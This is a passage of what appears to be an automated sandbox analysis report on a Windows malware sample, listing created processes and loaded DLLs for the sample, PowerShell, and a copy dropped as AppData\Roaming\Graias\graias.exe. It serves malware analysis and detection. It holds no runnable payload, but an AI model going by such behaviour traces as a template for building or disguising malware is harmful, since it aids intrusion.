                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1204 --field-trial-handle=1964,i,9634848512687327071,160386830931210519,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=1992,i,15123479563739650555,17542146906633038749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1596 --field-trial-handle=2032,i,2098739127948043686,10317841462462024608,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,8929845415192330188,781615668034862370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1960,i,9677392010693155346,11350815433485431755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1968,i,10908976342037239078,6657148638705883583,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1980,i,15324472771725808384,11056097287078458784,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1972,i,1428648053043398560,3532581574471474972,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1984,i,3981841079913460613,3962020599342444513,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: twext.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: shacct.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: idstore.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: starttiledata.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: acppage.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: msi.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: wlidprov.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: provsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
